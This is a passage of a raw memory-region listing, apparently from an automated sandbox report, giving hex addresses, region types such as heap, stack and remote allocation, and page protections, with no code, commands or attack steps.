page execute and read and write
|
||
610000
|
trusted library allocation
|
page read and write
|
||
142D651A000
|
heap
|
page read and write
|
||
7FFAAC4B4000
|
trusted library allocation
|
page read and write
|
||
572E000
|
stack
|
page read and write
|
||
1932CE90000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC320000
|
trusted library allocation
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
98C04FE000
|
stack
|
page read and write
|
||
7FFAACB3C000
|
trusted library allocation
|
page read and write
|
||
23D0763F000
|
heap
|
page read and write
|
||
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
B0C64FE000
|
unkown
|
page readonly
|
||
1B0427C0000
|
heap
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
23D06F0E000
|
heap
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
7FFAAC695000
|
trusted library allocation
|
page read and write
|
||
7FFAACA5F000
|
trusted library allocation
|
page read and write
|
||
7FFAACB42000
|
trusted library allocation
|
page read and write
|
||
16E992A3000
|
trusted library allocation
|
page read and write
|
||
23D07677000
|
heap
|
page read and write
|
||
142DB6F0000
|
trusted library allocation
|
page read and write
|
||
7FFAACB8C000
|
trusted library allocation
|
page read and write
|
||
23D06F82000
|
heap
|
page read and write
|
||
142DB4B0000
|
remote allocation
|
page read and write
|
||
7FFAAC7CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7DB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC57E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC732000
|
trusted library allocation
|
page read and write
|
||
384BEFC000
|
stack
|
page read and write
|
||
7FFAAC34F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E0000
|
trusted library allocation
|
page read and write
|
||
29A60FB000
|
stack
|
page read and write
|
||
7FFAAC469000
|
trusted library allocation
|
page read and write
|
||
23D06F8B000
|
heap
|
page read and write
|
||
12C000
|
stack
|
page read and write
|
||
23D066AD000
|
heap
|
page read and write
|
||
7FFAAC884000
|
trusted library allocation
|
page read and write
|
||
7FFAACA1B000
|
trusted library allocation
|
page read and write
|
||
7FFAACAF3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC93B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8AD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3BD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC491000
|
trusted library allocation
|
page read and write
|
||
7FFAAC767000
|
trusted library allocation
|
page read and write
|
||
7FFAAC902000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8FB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC85A000
|
trusted library allocation
|
page read and write
|
||
1B0426E0000
|
heap
|
page read and write
|
||
7FFAAC4EC000
|
trusted library allocation
|
page read and write
|
||
16E99310000
|
heap
|
page read and write
|
||
7FFAAC83C000
|
trusted library allocation
|
page read and write
|
||
15AA000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC56D000
|
trusted library allocation
|
page read and write
|
||
142D5C59000
|
heap
|
page read and write
|
||
7FFAACA85000
|
trusted library allocation
|
page read and write
|
||
142D6513000
|
heap
|
page read and write
|
||
7FFAAC870000
|
trusted library allocation
|
page read and write
|
||
62000
|
unkown
|
page readonly
|
||
7FFAAC87B000
|
trusted library allocation
|
page read and write
|
||
23D0661F000
|
heap
|
page read and write
|
||
7FFAAC552000
|
trusted library allocation
|
page read and write
|
||
142D6400000
|
heap
|
page read and write
|
||
142DB221000
|
heap
|
page read and write
|
||
98BFDFE000
|
stack
|
page read and write
|
||
142D5D02000
|
heap
|
page read and write
|
||
7FFAAC7BC000
|
trusted library allocation
|
page read and write
|
||
292621C0000
|
heap
|
page read and write
|
||
2109C450000
|
remote allocation
|
page read and write
|
||
7FFAAC9F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC979000
|
trusted library allocation
|
page read and write
|
||
2109BE20000
|
heap
|
page read and write
|
||
1B042450000
|
unkown
|
page readonly
|
||
DAB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC354000
|
trusted library allocation
|
page read and write
|
||
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC7B9000
|
trusted library allocation
|
page read and write
|
||
A0964FF000
|
stack
|
page read and write
|
||
7FFAAC8FE000
|
trusted library allocation
|
page read and write
|
||
7FFAAC876000
|
trusted library allocation
|
page read and write
|
||
29273DB8000
|
trusted library allocation
|
page read and write
|
||
292621A0000
|
heap
|
page read and write
|
||
D74000
|
trusted library allocation
|
page read and write
|
||
1BC8E800000
|
heap
|
page read and write
|
||
24FB000
|
trusted library allocation
|
page read and write
|
||
1F28A040000
|
direct allocation
|
page execute and read and write
|
||
23D06F72000
|
heap
|
page read and write
|
||
23D07680000
|
heap
|
page read and write
|
||
9C55EF4000
|
stack
|
page read and write
|
||
7FFAAC7C4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3BA000
|
trusted library allocation
|
page read and write
|
||
142DB169000
|
trusted library allocation
|
page read and write
|
||
B73000
|
trusted library allocation
|
page read and write
|
||
7FFAAC785000
|
trusted library allocation
|
page read and write
|
||
26E36A40000
|
heap
|
page read and write
|
||
7FFAAC58C000
|
trusted library allocation
|
page read and write
|
||
142DB112000
|
trusted library allocation
|
page read and write
|
||
23D07669000
|
heap
|
page read and write
|
||
7FFAAC8DF000
|
trusted library allocation
|
page read and write
|
||
1BCA0C01000
|
trusted library allocation
|
page read and write
|
||
7FFAAC143000
|
trusted library allocation
|
page read and write
|
||
65A000
|
trusted library allocation
|
page execute and read and write
|
||
23D0763D000
|
heap
|
page read and write
|
||
9A0000
|
trusted library allocation
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
29264175000
|
trusted library allocation
|
page read and write
|
||
7FFAAC130000
|
trusted library allocation
|
page read and write
|
||
1B0441D1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC57B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
7FFAAC30A000
|
trusted library allocation
|
page read and write
|
||
16E9916C000
|
heap
|
page read and write
|
||
7FFAAC123000
|
trusted library allocation
|
page execute and read and write
|
||
694000
|
heap
|
page read and write
|
||
7FFAAC491000
|
trusted library allocation
|
page read and write
|
||
42D66FE000
|
stack
|
page read and write
|
||
1660000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACB4A000
|
trusted library allocation
|
page read and write
|
||
1B043FD7000
|
heap
|
page read and write
|
||
142DB780000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7F3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC73D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC922000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4AD000
|
trusted library allocation
|
page read and write
|
||
142D5CFE000
|
heap
|
page read and write
|
||
7FFAAC3BA000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B7000
|
trusted library allocation
|
page read and write
|
||
1BC907DF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC932000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8AD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC756000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7EF000
|
trusted library allocation
|
page read and write
|
||
7FFAACAB9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC63E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC833000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7E5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC17C000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F77000
|
heap
|
page read and write
|
||
5510000
|
heap
|
page read and write
|
||
9C568FA000
|
stack
|
page read and write
|
||
7FFAAC7BE000
|
trusted library allocation
|
page read and write
|
||
1BC8E752000
|
heap
|
page read and write
|
||
7FFAAC15B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
23D06D80000
|
remote allocation
|
page read and write
|
||
DA7000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC76C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
1F289E0B000
|
unkown
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
A36A6FF000
|
stack
|
page read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC66D000
|
trusted library allocation
|
page read and write
|
||
7FFAACA1B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3B8000
|
trusted library allocation
|
page read and write
|
||
142DB140000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8F7000
|
trusted library allocation
|
page read and write
|
||
1F289D00000
|
heap
|
page read and write
|
||
7FFAACA82000
|
trusted library allocation
|
page read and write
|
||
7FFAAC769000
|
trusted library allocation
|
page read and write
|
||
5BF0000
|
heap
|
page read and write
|
||
23D06F33000
|
heap
|
page read and write
|
||
1F289F24000
|
heap
|
page read and write
|
||
7FFAAC8CD000
|
trusted library allocation
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
29263DF8000
|
trusted library allocation
|
page read and write
|
||
BA8DDFD000
|
stack
|
page read and write
|
||
23D07682000
|
heap
|
page read and write
|
||
7FF7FE540000
|
unkown
|
page readonly
|
||
7FFAAC8A9000
|
trusted library allocation
|
page read and write
|
||
2109A310000
|
heap
|
page read and write
|
||
4A30000
|
heap
|
page read and write
|
||
1BC8E781000
|
heap
|
page read and write
|
||
23D06F32000
|
heap
|
page read and write
|
||
23D076A8000
|
heap
|
page read and write
|
||
29263CD0000
|
heap
|
page read and write
|
||
1B056B13000
|
trusted library allocation
|
page read and write
|
||
7FFAAC816000
|
trusted library allocation
|
page read and write
|
||
2109C390000
|
remote allocation
|
page execute and read and write
|
||
1B0541E1000
|
trusted library allocation
|
page read and write
|
||
23D07702000
|
heap
|
page read and write
|
||
7FFAAC5EE000
|
trusted library allocation
|
page read and write
|
||
D84000
|
trusted library allocation
|
page read and write
|
||
72F5000
|
trusted library allocation
|
page read and write
|
||
DC0000
|
trusted library allocation
|
page read and write
|
||
406000
|
remote allocation
|
page execute and read and write
|
||
1F289E3C000
|
unkown
|
page read and write
|
||
1670000
|
heap
|
page read and write
|
||
7FFAAC72F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC819000
|
trusted library allocation
|
page read and write
|
||
1BCA01E1000
|
trusted library allocation
|
page read and write
|
||
98C05FD000
|
stack
|
page read and write
|
||
7FFAAC66D000
|
trusted library allocation
|
page read and write
|
||
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
1F289F02000
|
trusted library allocation
|
page read and write
|
||
142DB25A000
|
heap
|
page read and write
|
||
2109BDE3000
|
heap
|
page read and write
|
||
7FFAAC73D000
|
trusted library allocation
|
page read and write
|
||
142D5D02000
|
heap
|
page read and write
|
||
7FFAAC12D000
|
trusted library allocation
|
page execute and read and write
|
||
16E992A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
292642A0000
|
trusted library allocation
|
page read and write
|
||
1DDEED70000
|
heap
|
page read and write
|
||
7FFAAC93B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC582000
|
trusted library allocation
|
page read and write
|
||
7FFAAC870000
|
trusted library allocation
|
page read and write
|
||
7FFAAC926000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8FE000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8FB000
|
trusted library allocation
|
page read and write
|
||
7FFAACA64000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC144000
|
trusted library allocation
|
page read and write
|
||
23D06613000
|
heap
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
29263C40000
|
heap
|
page read and write
|
||
1932CDD0000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC64C000
|
trusted library allocation
|
page read and write
|
||
1B057513000
|
trusted library allocation
|
page read and write
|
||
23D066D2000
|
heap
|
page read and write
|
||
7FFAAC83A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC75A000
|
trusted library allocation
|
page read and write
|
||
23D07712000
|
heap
|
page read and write
|
||
EB3000
|
heap
|
page read and write
|
||
7FFB1D540000
|
unkown
|
page readonly
|
||
7FFAAC886000
|
trusted library allocation
|
page read and write
|
||
14002D000
|
remote allocation
|
page execute and read and write
|
||
23D06F7A000
|
heap
|
page read and write
|
||
384B9FE000
|
unkown
|
page readonly
|
||
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC836000
|
trusted library allocation
|
page read and write
|
||
7FFAAC328000
|
trusted library allocation
|
page read and write
|
||
7FFAAC89F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC905000
|
trusted library allocation
|
page read and write
|
||
7FFAACB0F000
|
trusted library allocation
|
page read and write
|
||
7FFAACB0F000
|
trusted library allocation
|
page read and write
|
||
1A4B2570000
|
heap
|
page execute and read and write
|
||
7FFAAC976000
|
trusted library allocation
|
page read and write
|
||
23D076FC000
|
heap
|
page read and write
|
||
7FFAAC124000
|
trusted library allocation
|
page read and write
|
||
7FFAACA8E000
|
trusted library allocation
|
page read and write
|
||
23D06F2A000
|
heap
|
page read and write
|
||
7FFAAC7CB000
|
trusted library allocation
|
page read and write
|
||
142DB130000
|
trusted library allocation
|
page read and write
|
||
6720000
|
heap
|
page read and write
|
||
1A4CBE93000
|
heap
|
page read and write
|
||
23D06F30000
|
heap
|
page read and write
|
||
7FFAAC34C000
|
trusted library allocation
|
page read and write
|
||
7FFAACAD6000
|
trusted library allocation
|
page read and write
|
||
BC0000
|
trusted library allocation
|
page execute and read and write
|
||
16EB2CC0000
|
trusted library allocation
|
page read and write
|
||
5C82000
|
heap
|
page read and write
|
||
2927F315000
|
heap
|
page read and write
|
||
1A4B0973000
|
heap
|
page read and write
|
||
7FFAAC8BC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
7FFAAC138000
|
trusted library allocation
|
page read and write
|
||
7FFAAC752000
|
trusted library allocation
|
page read and write
|
||
EA4000
|
heap
|
page read and write
|
||
23D06F56000
|
heap
|
page read and write
|
||
7FFAAC7EC000
|
trusted library allocation
|
page read and write
|
||
42D65FE000
|
stack
|
page read and write
|
||
7FFAAC91A000
|
trusted library allocation
|
page read and write
|
||
23D06F7B000
|
heap
|
page read and write
|
||
60AE000
|
stack
|
page read and write
|
||
23D0769B000
|
heap
|
page read and write
|
||
142D63E0000
|
trusted library allocation
|
page read and write
|
||
23D06F96000
|
heap
|
page read and write
|
||
1B05CB50000
|
heap
|
page read and write
|
||
142D5C6A000
|
heap
|
page read and write
|
||
24F6000
|
trusted library allocation
|
page read and write
|
||
7320000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC849000
|
trusted library allocation
|
page read and write
|
||
7FFAAC133000
|
trusted library allocation
|
page execute and read and write
|
||
98C02FF000
|
stack
|
page read and write
|
||
7FFAAC64A000
|
trusted library allocation
|
page read and write
|
||
23D06F6E000
|
heap
|
page read and write
|
||
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
7FFAAC889000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2DE000
|
trusted library allocation
|
page read and write
|
||
1BCAA350000
|
heap
|
page read and write
|
||
273D000
|
stack
|
page read and write
|
||
1F289E13000
|
unkown
|
page read and write
|
||
142DB260000
|
trusted library allocation
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
7FFAAC58A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC816000
|
trusted library allocation
|
page read and write
|
||
7FFAAC79C000
|
trusted library allocation
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
1932CEE8000
|
heap
|
page read and write
|
||
7FFAAC240000
|
trusted library allocation
|
page execute and read and write
|
||
643000
|
trusted library allocation
|
page read and write
|
||
7FFAAC876000
|
trusted library allocation
|
page read and write
|
||
23D0760C000
|
heap
|
page read and write
|
||
23D07724000
|
heap
|
page read and write
|
||
7FFAAC785000
|
trusted library allocation
|
page read and write
|
||
23D07723000
|
heap
|
page read and write
|
||
142D5C8D000
|
heap
|
page read and write
|
||
1BC90712000
|
trusted library allocation
|
page read and write
|
||
7FFAAC248000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
65FC000
|
stack
|
page read and write
|
||
2927F41B000
|
heap
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
113BF000
|
trusted library allocation
|
page read and write
|
||
1DDEEFF0000
|
unkown
|
page read and write
|
||
29A5AFD000
|
stack
|
page read and write
|
||
2927F30B000
|
heap
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAACAD6000
|
trusted library allocation
|
page read and write
|
||
66FC000
|
stack
|
page read and write
|
||
7FFAACA20000
|
trusted library allocation
|
page read and write
|
||
200A9900000
|
heap
|
page read and write
|
||
7FFAAC130000
|
trusted library allocation
|
page read and write
|
||
23D06F75000
|
heap
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
125B000
|
heap
|
page read and write
|
||
142D63A1000
|
trusted library allocation
|
page read and write
|
||
1A4B0BD0000
|
trusted library section
|
page readonly
|
||
9C565FE000
|
stack
|
page read and write
|
||
23D06F5A000
|
heap
|
page read and write
|
||
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
142D5B50000
|
heap
|
page read and write
|
||
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC154000
|
trusted library allocation
|
page read and write
|
||
23D06F55000
|
heap
|
page read and write
|
||
7FFAAC4B4000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
7FFAAC91D000
|
trusted library allocation
|
page read and write
|
||
23D06F6B000
|
heap
|
page read and write
|
||
9B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC828000
|
trusted library allocation
|
page read and write
|
||
43B000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC8C9000
|
trusted library allocation
|
page read and write
|
||
23D076D1000
|
heap
|
page read and write
|
||
1BCA8A80000
|
heap
|
page read and write
|
||
7FFB1D541000
|
unkown
|
page execute read
|
||
384CBFE000
|
unkown
|
page readonly
|
||
1A4B0930000
|
trusted library allocation
|
page read and write
|
||
7FFAAC378000
|
trusted library allocation
|
page read and write
|
||
7FFAACA38000
|
trusted library allocation
|
page read and write
|
||
16E99160000
|
heap
|
page read and write
|
||
7FFAAC922000
|
trusted library allocation
|
page read and write
|
||
10F7000
|
stack
|
page read and write
|
||
7FFAAC94B000
|
trusted library allocation
|
page read and write
|
||
23D06F98000
|
heap
|
page read and write
|
||
7FFAACB34000
|
trusted library allocation
|
page read and write
|
||
7FFAAC874000
|
trusted library allocation
|
page read and write
|
||
A36ACFA000
|
stack
|
page read and write
|
||
23D06F32000
|
heap
|
page read and write
|
||
7FFAAC7F3000
|
trusted library allocation
|
page read and write
|
||
D20000
|
heap
|
page read and write
|
||
142DB240000
|
heap
|
page read and write
|
||
5CC1000
|
heap
|
page read and write
|
||
7FFAAC7BE000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72D000
|
trusted library allocation
|
page read and write
|
||
23D06F5A000
|
heap
|
page read and write
|
||
7FFAACA44000
|
trusted library allocation
|
page read and write
|
||
1A4B24D0000
|
heap
|
page read and write
|
||
B6D000
|
trusted library allocation
|
page execute and read and write
|
||
1A4CAD80000
|
heap
|
page read and write
|
||
23D06E00000
|
heap
|
page read and write
|
||
1BCAB638000
|
heap
|
page read and write
|
||
2109C3E9000
|
direct allocation
|
page execute and read and write
|
||
23D06F33000
|
heap
|
page read and write
|
||
7FFAAC912000
|
trusted library allocation
|
page read and write
|
||
142DB150000
|
trusted library allocation
|
page read and write
|
||
2927E1F0000
|
heap
|
page read and write
|
||
24CE000
|
stack
|
page read and write
|
||
1BC8E750000
|
heap
|
page read and write
|
||
7FFAAC8F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC924000
|
trusted library allocation
|
page read and write
|
||
7FFAAC53C000
|
trusted library allocation
|
page read and write
|
||
1B04260E000
|
heap
|
page read and write
|
||
7FFAAC648000
|
trusted library allocation
|
page read and write
|
||
7FFAACA8B000
|
trusted library allocation
|
page read and write
|
||
23D06F57000
|
heap
|
page read and write
|
||
16E991CF000
|
heap
|
page read and write
|
||
23D07673000
|
heap
|
page read and write
|
||
2AE0000
|
heap
|
page execute and read and write
|
||
7FFAAC46B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC976000
|
trusted library allocation
|
page read and write
|
||
7FFAAC673000
|
trusted library allocation
|
page read and write
|
||
7FFAACB39000
|
trusted library allocation
|
page read and write
|
||
1BCA8B50000
|
heap
|
page read and write
|
||
2927F2B0000
|
heap
|
page read and write
|
||
7FFAACB3E000
|
trusted library allocation
|
page read and write
|
||
1BCAB626000
|
heap
|
page read and write
|
||
7FFAAC579000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4F6000
|
trusted library allocation
|
page read and write
|
||
3F74FF000
|
stack
|
page read and write
|
||
1BC906A9000
|
trusted library allocation
|
page read and write
|
||
29FD000
|
stack
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC66B000
|
trusted library allocation
|
page read and write
|
||
7FFAACB09000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3B8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2F0000
|
trusted library allocation
|
page execute and read and write
|
||
16E99319000
|
heap
|
page read and write
|
||
7FFAAC81B000
|
trusted library allocation
|
page read and write
|
||
23D066F0000
|
heap
|
page read and write
|
||
1B05C8A9000
|
heap
|
page read and write
|
||
7FFAAC787000
|
trusted library allocation
|
page read and write
|
||
7FFAAC822000
|
trusted library allocation
|
page read and write
|
||
142DB410000
|
trusted library allocation
|
page read and write
|
||
29273DDD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC81B000
|
trusted library allocation
|
page read and write
|
||
56E0000
|
heap
|
page execute and read and write
|
||
7FFAAC74A000
|
trusted library allocation
|
page read and write
|
||
142D5C65000
|
heap
|
page read and write
|
||
7FFAAC64C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC57B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC655000
|
trusted library allocation
|
page read and write
|
||
7FFAAC588000
|
trusted library allocation
|
page read and write
|
||
1BC901C1000
|
trusted library allocation
|
page read and write
|
||
1DDEEFD0000
|
heap
|
page read and write
|
||
7FFAAC384000
|
trusted library allocation
|
page read and write
|
||
1BC8E810000
|
trusted library allocation
|
page read and write
|
||
7FFAAC70E000
|
trusted library allocation
|
page read and write
|
||
1A4B0890000
|
heap
|
page read and write
|
||
142D6A40000
|
trusted library allocation
|
page read and write
|
||
7FFAAC854000
|
trusted library allocation
|
page read and write
|
||
7FFAAC952000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC397000
|
trusted library allocation
|
page read and write
|
||
1A4B24D9000
|
heap
|
page read and write
|
||
7FFAAC552000
|
trusted library allocation
|
page read and write
|
||
1B05F4B0000
|
trusted library section
|
page read and write
|
||
142DB110000
|
trusted library allocation
|
page read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
23D06F7E000
|
heap
|
page read and write
|
||
1F289E37000
|
heap
|
page read and write
|
||
23D07712000
|
heap
|
page read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
B64000
|
trusted library allocation
|
page read and write
|
||
7FFAAC842000
|
trusted library allocation
|
page read and write
|
||
142DB305000
|
heap
|
page read and write
|
||
7FFAAC7DD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC83F000
|
trusted library allocation
|
page read and write
|
||
7FFAACB37000
|
trusted library allocation
|
page read and write
|
||
5D8C000
|
stack
|
page read and write
|
||
1A4CC480000
|
heap
|
page read and write
|
||
1A4B0B90000
|
heap
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC122000
|
trusted library allocation
|
page read and write
|
||
1A4B0BA0000
|
heap
|
page read and write
|
||
7FFAAC936000
|
trusted library allocation
|
page read and write
|
||
7FF7FE54D000
|
unkown
|
page readonly
|
||
23D06F30000
|
heap
|
page read and write
|
||
7FFAAC852000
|
trusted library allocation
|
page read and write
|
||
7FFAAC549000
|
trusted library allocation
|
page read and write
|
||
7FFAAC79A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC754000
|
trusted library allocation
|
page read and write
|
||
7FFAAC84E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC366000
|
trusted library allocation
|
page read and write
|
||
16EB3600000
|
heap
|
page read and write
|
||
7FFAAC655000
|
trusted library allocation
|
page read and write
|
||
1F289E74000
|
heap
|
page read and write
|
||
16E991A4000
|
heap
|
page read and write
|
||
1BC8E77C000
|
heap
|
page read and write
|
||
5533000
|
heap
|
page read and write
|
||
2927D980000
|
heap
|
page read and write
|
||
142D6500000
|
heap
|
page read and write
|
||
7FFAACA5D000
|
trusted library allocation
|
page read and write
|
||
23D07723000
|
heap
|
page read and write
|
||
7FFAAC7C4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5DE000
|
trusted library allocation
|
page read and write
|
||
A36A9FE000
|
stack
|
page read and write
|
||
7FFAAC8DB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8DF000
|
trusted library allocation
|
page read and write
|
||
5520000
|
trusted library allocation
|
page read and write
|
||
20B6A7D6000
|
heap
|
page read and write
|
||
7FFAAC248000
|
trusted library allocation
|
page execute and read and write
|
||
A09637F000
|
stack
|
page read and write
|
||
140000000
|
remote allocation
|
page execute and read and write
|
||
6CD000
|
heap
|
page read and write
|
||
14002C000
|
remote allocation
|
page read and write
|
||
640000
|
trusted library allocation
|
page read and write
|
||
17D46D60000
|
heap
|
page readonly
|
||
1B042656000
|
heap
|
page read and write
|
||
B0C657E000
|
stack
|
page read and write
|
||
7FFAAC1E6000
|
trusted library allocation
|
page read and write
|
||
1A4C26D3000
|
trusted library allocation
|
page read and write
|
||
5180000
|
heap
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
23D06F56000
|
heap
|
page read and write
|
||
7FFAAC894000
|
trusted library allocation
|
page read and write
|
||
1A4B2C8C000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
23D0769B000
|
heap
|
page read and write
|
||
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
7FFAAC43A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
29A5EFE000
|
stack
|
page read and write
|
||
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
29A58FF000
|
stack
|
page read and write
|
||
142DB400000
|
trusted library allocation
|
page read and write
|
||
7FFAAC814000
|
trusted library allocation
|
page read and write
|
||
16E99000000
|
heap
|
page read and write
|
||
1BC900A5000
|
heap
|
page read and write
|
||
7FFAACA92000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3E2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC846000
|
trusted library allocation
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
582F000
|
stack
|
page read and write
|
||
7FFAACB11000
|
trusted library allocation
|
page read and write
|
||
384B7FE000
|
unkown
|
page readonly
|
||
7FFAAC89F000
|
trusted library allocation
|
page read and write
|
||
16E9ADD6000
|
trusted library allocation
|
page read and write
|
||
29A5FFD000
|
stack
|
page read and write
|
||
23D06F56000
|
heap
|
page read and write
|
||
5AAE000
|
stack
|
page read and write
|
||
7FFAAC765000
|
trusted library allocation
|
page read and write
|
||
23D06F0E000
|
heap
|
page read and write
|
||
23D0663F000
|
heap
|
page read and write
|
||
7FFAACB64000
|
trusted library allocation
|
page read and write
|
||
E69000
|
heap
|
page read and write
|
||
7FFAACB47000
|
trusted library allocation
|
page read and write
|
||
142D5C8B000
|
heap
|
page read and write
|
||
7FFAAC72D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC55D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC746000
|
trusted library allocation
|
page read and write
|
||
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC729000
|
trusted library allocation
|
page read and write
|
||
7FFAAC894000
|
trusted library allocation
|
page read and write
|
||
7FFAACB8C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC45C000
|
trusted library allocation
|
page read and write
|
||
7FFAACA40000
|
trusted library allocation
|
page read and write
|
||
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
23D0671A000
|
heap
|
page read and write
|
||
7FFAAC1D6000
|
trusted library allocation
|
page read and write
|
||
142D5C27000
|
heap
|
page read and write
|
||
7FFAACB2D000
|
trusted library allocation
|
page read and write
|
||
7FFAACB32000
|
trusted library allocation
|
page read and write
|
||
7FFAACA82000
|
